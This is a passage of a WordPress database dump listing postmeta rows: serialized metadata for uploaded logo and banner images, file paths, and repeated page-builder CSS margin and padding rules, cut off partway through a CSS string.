(34934,5053,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:591;s:6:\"height\";i:591;s:4:\"file\";s:29:\"2023/07/5X5cm-PIESAT-Logo.png\";s:8:\"filesize\";i:75229;s:5:\"sizes\";a:3:{s:6:\"medium\";a:5:{s:4:\"file\";s:29:\"5X5cm-PIESAT-Logo-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:32935;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:29:\"5X5cm-PIESAT-Logo-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:12530;}s:6:\"awb_sm\";a:5:{s:4:\"file\";s:29:\"5X5cm-PIESAT-Logo-500x500.png\";s:5:\"width\";i:500;s:6:\"height\";i:500;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:79552;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(34935,5061,'_wp_attached_file','2023/07/Logo-Pure-2-scaled.jpg'),
(34936,5061,'_wp_attachment_metadata','a:7:{s:5:\"width\";i:2560;s:6:\"height\";i:2560;s:4:\"file\";s:30:\"2023/07/Logo-Pure-2-scaled.jpg\";s:8:\"filesize\";i:292980;s:5:\"sizes\";a:10:{s:6:\"medium\";a:5:{s:4:\"file\";s:23:\"Logo-Pure-2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19564;}s:5:\"large\";a:5:{s:4:\"file\";s:25:\"Logo-Pure-2-1024x1024.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:92377;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:23:\"Logo-Pure-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7378;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:23:\"Logo-Pure-2-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:64506;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:25:\"Logo-Pure-2-1536x1536.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:151595;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:25:\"Logo-Pure-2-2048x2048.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:2048;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:218311;}s:6:\"awb_sm\";a:5:{s:4:\"file\";s:23:\"Logo-Pure-2-500x500.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:38088;}s:6:\"awb_md\";a:5:{s:4:\"file\";s:23:\"Logo-Pure-2-800x800.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:800;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:68375;}s:6:\"awb_lg\";a:5:{s:4:\"file\";s:25:\"Logo-Pure-2-1280x1280.jpg\";s:5:\"width\";i:1280;s:6:\"height\";i:1280;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:120868;}s:6:\"awb_xl\";a:5:{s:4:\"file\";s:25:\"Logo-Pure-2-1920x1920.jpg\";s:5:\"width\";i:1920;s:6:\"height\";i:1920;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:199891;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:9:\"Logo Pure\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}s:14:\"original_image\";s:15:\"Logo-Pure-2.jpg\";}'),
(34937,3066,'_oembed_53e6450e3561797f253d9d2c6071dc83','{{unknown}}'),
(34938,5066,'_wp_attached_file','2023/08/preliminary.png'),
(34939,5066,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1882;s:6:\"height\";i:600;s:4:\"file\";s:23:\"2023/08/preliminary.png\";s:8:\"filesize\";i:277503;s:5:\"sizes\";a:8:{s:6:\"medium\";a:5:{s:4:\"file\";s:22:\"preliminary-300x96.png\";s:5:\"width\";i:300;s:6:\"height\";i:96;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:25515;}s:5:\"large\";a:5:{s:4:\"file\";s:24:\"preliminary-1024x326.png\";s:5:\"width\";i:1024;s:6:\"height\";i:326;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:232866;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:23:\"preliminary-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:7580;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:23:\"preliminary-768x245.png\";s:5:\"width\";i:768;s:6:\"height\";i:245;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:153322;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:24:\"preliminary-1536x490.png\";s:5:\"width\";i:1536;s:6:\"height\";i:490;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:569365;}s:6:\"awb_sm\";a:5:{s:4:\"file\";s:23:\"preliminary-500x159.png\";s:5:\"width\";i:500;s:6:\"height\";i:159;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:66129;}s:6:\"awb_md\";a:5:{s:4:\"file\";s:23:\"preliminary-800x255.png\";s:5:\"width\";i:800;s:6:\"height\";i:255;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:168685;}s:6:\"awb_lg\";a:5:{s:4:\"file\";s:24:\"preliminary-1280x408.png\";s:5:\"width\";i:1280;s:6:\"height\";i:408;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:396390;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(34940,5068,'_wp_attached_file','2023/08/preliminary-1.png'),
(34941,5068,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1882;s:6:\"height\";i:809;s:4:\"file\";s:25:\"2023/08/preliminary-1.png\";s:8:\"filesize\";i:364946;s:5:\"sizes\";a:8:{s:6:\"medium\";a:5:{s:4:\"file\";s:25:\"preliminary-1-300x129.png\";s:5:\"width\";i:300;s:6:\"height\";i:129;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:33411;}s:5:\"large\";a:5:{s:4:\"file\";s:26:\"preliminary-1-1024x440.png\";s:5:\"width\";i:1024;s:6:\"height\";i:440;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:343537;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:25:\"preliminary-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:14464;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:25:\"preliminary-1-768x330.png\";s:5:\"width\";i:768;s:6:\"height\";i:330;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:203814;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:26:\"preliminary-1-1536x660.png\";s:5:\"width\";i:1536;s:6:\"height\";i:660;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:745214;}s:6:\"awb_sm\";a:5:{s:4:\"file\";s:25:\"preliminary-1-500x215.png\";s:5:\"width\";i:500;s:6:\"height\";i:215;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:88802;}s:6:\"awb_md\";a:5:{s:4:\"file\";s:25:\"preliminary-1-800x344.png\";s:5:\"width\";i:800;s:6:\"height\";i:344;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:218046;}s:6:\"awb_lg\";a:5:{s:4:\"file\";s:26:\"preliminary-1-1280x550.png\";s:5:\"width\";i:1280;s:6:\"height\";i:550;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:535742;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(34942,5073,'_wp_attached_file','2023/08/Preliminary.jpg'),
(34943,5073,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1280;s:6:\"height\";i:630;s:4:\"file\";s:23:\"2023/08/Preliminary.jpg\";s:8:\"filesize\";i:204465;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:23:\"Preliminary-300x148.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:148;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14984;}s:5:\"large\";a:5:{s:4:\"file\";s:24:\"Preliminary-1024x504.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:504;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:108969;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:23:\"Preliminary-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7510;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:23:\"Preliminary-768x378.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:378;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:71756;}s:6:\"awb_sm\";a:5:{s:4:\"file\";s:23:\"Preliminary-500x246.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:246;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:35321;}s:6:\"awb_md\";a:5:{s:4:\"file\";s:23:\"Preliminary-800x394.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:394;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:76602;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(34944,5090,'_wpb_shortcodes_custom_css','.vc_custom_1680403823446{margin-top: -35px !important;}.vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}.vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}.vc_custom_1680403783341{margin-top: -15px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1687219449581{margin-top: 100px !important;}.vc_custom_1689081933017{margin-top: 100px !important;}.vc_custom_1689081968974{margin-top: 95px !important;}.vc_custom_1689081337215{margin-top: 40px !important;}.vc_custom_1689080719428{margin-top: 0px !important;}.vc_custom_1689081395417{margin-top: 10px !important;}.vc_custom_1687096091997{margin-top: 125px !important;}.vc_custom_1687096010128{margin-top: 50px !important;}.vc_custom_1687095942758{margin-top: 137px !important;}.vc_custom_1687219836213{margin-top: -px !important;}.vc_custom_1688951584642{margin-top: 45px !important;}.vc_custom_1688951717998{margin-top: 90px !important;}.vc_custom_1687095881067{margin-top: 20px !important;}.vc_custom_1690459872519{margin-top: 50px !important;}.vc_custom_1690460056235{margin-top: 50px !important;}.vc_custom_1688951105389{margin-top: 50px !important;}.vc_custom_1687096291206{margin-top: 50px !important;}.vc_custom_1687096367037{margin-top: 50px !important;}.vc_custom_1687096532104{margin-top: 88px !important;}.vc_custom_1690251276274{margin-top: 50px !important;}.vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1690452445334{margin-top: 50px !important;}.vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1690600884765{margin-top: 50px !important;}.vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1691508515384{margin-top: 50px !important;}.vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}.vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1687711659617{margin-top: 0px !important;}.vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}.vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}.vc_custom_1687553105001{margin-top: 0px !important;}.vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1668204929553{margin-top: 20px !important;}.vc_custom_1687570624975{margin-top: 140px !important;}.vc_custom_1687570128641{margin-top: -70px !important;}.vc_custom_1687570507588{margin-top: 50px !important;}.vc_custom_1687570551843{margin-top: 50px !important;}.vc_custom_1686320668385{margin-top: -25px !important;}.vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(34945,5091,'_wpb_shortcodes_custom_css','.vc_custom_1680403823446{margin-top: -35px !important;}.vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}.vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}.vc_custom_1680403783341{margin-top: -15px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1687219449581{margin-top: 100px !important;}.vc_custom_1689081933017{margin-top: 100px !important;}.vc_custom_1689081968974{margin-top: 95px !important;}.vc_custom_1689081337215{margin-top: 40px !important;}.vc_custom_1689080719428{margin-top: 0px !important;}.vc_custom_1689081395417{margin-top: 10px !important;}.vc_custom_1687096091997{margin-top: 125px !important;}.vc_custom_1687096010128{margin-top: 50px !important;}.vc_custom_1687095942758{margin-top: 137px !important;}.vc_custom_1687219836213{margin-top: -px !important;}.vc_custom_1688951584642{margin-top: 45px !important;}.vc_custom_1688951717998{margin-top: 90px !important;}.vc_custom_1687095881067{margin-top: 20px !important;}.vc_custom_1690459872519{margin-top: 50px !important;}.vc_custom_1690460056235{margin-top: 50px !important;}.vc_custom_1688951105389{margin-top: 50px !important;}.vc_custom_1687096291206{margin-top: 50px !important;}.vc_custom_1687096367037{margin-top: 50px !important;}.vc_custom_1687096532104{margin-top: 88px !important;}.vc_custom_1690251276274{margin-top: 50px !important;}.vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1690452445334{margin-top: 50px !important;}.vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1690600884765{margin-top: 50px !important;}.vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1691508515384{margin-top: 50px !important;}.vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}.vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1687711659617{margin-top: 0px !important;}.vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}.vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}.vc_custom_1687553105001{margin-top: 0px !important;}.vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1668204929553{margin-top: 20px !important;}.vc_custom_1687570624975{margin-top: 140px !important;}.vc_custom_1687570128641{margin-top: -70px !important;}.vc_custom_1687570507588{margin-top: 50px !important;}.vc_custom_1687570551843{margin-top: 50px !important;}.vc_custom_1686320668385{margin-top: -25px !important;}.vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(34946,5092,'_wpb_shortcodes_custom_css','.vc_custom_1680403823446{margin-top: -35px !important;}.vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}.vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}.vc_custom_1680403783341{margin-top: -15px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1687219449581{margin-top: 100px !important;}.vc_custom_1689081933017{margin-top: 100px !important;}.vc_custom_1689081968974{margin-top: 95px !important;}.vc_custom_1689081337215{margin-top: 40px !important;}.vc_custom_1689080719428{margin-top: 0px !important;}.vc_custom_1689081395417{margin-top: 10px !important;}.vc_custom_1687096091997{margin-top: 125px !important;}.vc_custom_1687096010128{margin-top: 50px !important;}.vc_custom_1687095942758{margin-top: 137px !important;}.vc_custom_1687219836213{margin-top: -px !important;}.vc_custom_1688951584642{margin-top: 45px !important;}.vc_custom_1688951717998{margin-top: 90px !important;}.vc_custom_1687095881067{margin-top: 20px !important;}.vc_custom_1690459872519{margin-top: 50px !important;}.vc_custom_1690460056235{margin-top: 50px !important;}.vc_custom_1688951105389{margin-top: 50px !important;}.vc_custom_1687096291206{margin-top: 50px !important;}.vc_custom_1687096367037{margin-top: 50px !important;}.vc_custom_1687096532104{margin-top: 88px !important;}.vc_custom_1690251276274{margin-top: 50px !important;}.vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1690452445334{margin-top: 50px !important;}.vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1690600884765{margin-top: 50px !important;}.vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1691508515384{margin-top: 50px !important;}.vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}.vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1687711659617{margin-top: 0px !important;}.vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}.vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}.vc_custom_1687553105001{margin-top: 0px !important;}.vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1668204929553{margin-top: 20px !important;}.vc_custom_1687570624975{margin-top: 140px !important;}.vc_custom_1687570128641{margin-top: -70px !important;}.vc_custom_1687570507588{margin-top: 50px !important;}.vc_custom_1687570551843{margin-top: 50px !important;}.vc_custom_1686320668385{margin-top: -25px !important;}.vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(34947,5093,'_wp_attached_file','2023/08/MBRSC-LOGO_1-01.png'),
(34948,5093,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:3326;s:6:\"height\";i:1647;s:4:\"file\";s:27:\"2023/08/MBRSC-LOGO_1-01.png\";s:8:\"filesize\";i:75197;s:5:\"sizes\";a:10:{s:6:\"medium\";a:5:{s:4:\"file\";s:27:\"MBRSC-LOGO_1-01-300x149.png\";s:5:\"width\";i:300;s:6:\"height\";i:149;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:9240;}s:5:\"large\";a:5:{s:4:\"file\";s:28:\"MBRSC-LOGO_1-01-1024x507.png\";s:5:\"width\";i:1024;s:6:\"height\";i:507;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:47303;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:27:\"MBRSC-LOGO_1-01-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:5817;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:27:\"MBRSC-LOGO_1-01-768x380.png\";s:5:\"width\";i:768;s:6:\"height\";i:380;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:32760;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:28:\"MBRSC-LOGO_1-01-1536x761.png\";s:5:\"width\";i:1536;s:6:\"height\";i:761;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:99584;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:29:\"MBRSC-LOGO_1-01-2048x1014.png\";s:5:\"width\";i:2048;s:6:\"height\";i:1014;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:135442;}s:6:\"awb_sm\";a:5:{s:4:\"file\";s:27:\"MBRSC-LOGO_1-01-500x248.png\";s:5:\"width\";i:500;s:6:\"height\";i:248;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:18161;}s:6:\"awb_md\";a:5:{s:4:\"file\";s:27:\"MBRSC-LOGO_1-01-800x396.png\";s:5:\"width\";i:800;s:6:\"height\";i:396;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:35471;}s:6:\"awb_lg\";a:5:{s:4:\"file\";s:28:\"MBRSC-LOGO_1-01-1280x634.png\";s:5:\"width\";i:1280;s:6:\"height\";i:634;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:71121;}s:6:\"awb_xl\";a:5:{s:4:\"file\";s:28:\"MBRSC-LOGO_1-01-1920x951.png\";s:5:\"width\";i:1920;s:6:\"height\";i:951;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:133921;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(34949,5094,'_wpb_shortcodes_custom_css','.vc_custom_1680403823446{margin-top: -35px !important;}.vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}.vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}.vc_custom_1680403783341{margin-top: -15px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1687219449581{margin-top: 100px !important;}.vc_custom_1689081933017{margin-top: 100px !important;}.vc_custom_1689081968974{margin-top: 95px !important;}.vc_custom_1689081968955{margin-top: 95px !important;}.vc_custom_1689081337215{margin-top: 40px !important;}.vc_custom_1689080719428{margin-top: 0px !important;}.vc_custom_1689081395417{margin-top: 10px !important;}.vc_custom_1687096091997{margin-top: 125px !important;}.vc_custom_1687096010128{margin-top: 50px !important;}.vc_custom_1687095942758{margin-top: 137px !important;}.vc_custom_1687219836213{margin-top: -px !important;}.vc_custom_1688951584642{margin-top: 45px !important;}.vc_custom_1688951717998{margin-top: 90px !important;}.vc_custom_1687095881067{margin-top: 20px !important;}.vc_custom_1690459872519{margin-top: 50px !important;}.vc_custom_1690460056235{margin-top: 50px !important;}.vc_custom_1688951105389{margin-top: 50px !important;}.vc_custom_1687096291206{margin-top: 50px !important;}.vc_custom_1687096367037{margin-top: 50px !important;}.vc_custom_1687096532104{margin-top: 88px 